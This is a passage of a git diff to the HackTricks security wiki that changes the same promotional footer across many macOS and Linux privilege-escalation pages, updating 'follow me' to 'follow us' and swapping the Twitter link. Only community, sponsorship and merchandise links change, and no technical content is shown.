+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -53,7 +53,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
index 38bbf3c12..5de9f3b73 100644
--- a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
+++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -194,7 +194,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-auto-start-locations.md b/macos-hardening/macos-auto-start-locations.md
index 979763639..e307ab9de 100644
--- a/macos-hardening/macos-auto-start-locations.md
+++ b/macos-hardening/macos-auto-start-locations.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -1785,7 +1785,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index 404022493..9d17b9456 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -230,7 +230,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-red-teaming/macos-keychain.md b/macos-hardening/macos-red-teaming/macos-keychain.md
index 921e10ff8..ba70c4c90 100644
--- a/macos-hardening/macos-red-teaming/macos-keychain.md
+++ b/macos-hardening/macos-red-teaming/macos-keychain.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -143,7 +143,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-red-teaming/macos-mdm/README.md b/macos-hardening/macos-red-teaming/macos-mdm/README.md
index 210a0d00a..24002a521 100644
--- a/macos-hardening/macos-red-teaming/macos-mdm/README.md
+++ b/macos-hardening/macos-red-teaming/macos-mdm/README.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -221,7 +221,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md b/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
index 6b3d77429..7ce217390 100644
--- a/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
+++ b/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -76,7 +76,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md b/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
index 0273e02eb..5959110b4 100644
--- a/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
+++ b/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -65,7 +65,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md
index 932f0551e..0fcf8364a 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -166,7 +166,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
index f459bc885..f8cd86d65 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -162,7 +162,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
index 521ff9d41..6746f852b 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -378,7 +378,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
index 4155a1fb4..be63575e5 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -861,7 +861,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index 14a0edc0e..da69901e1 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -101,7 +101,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
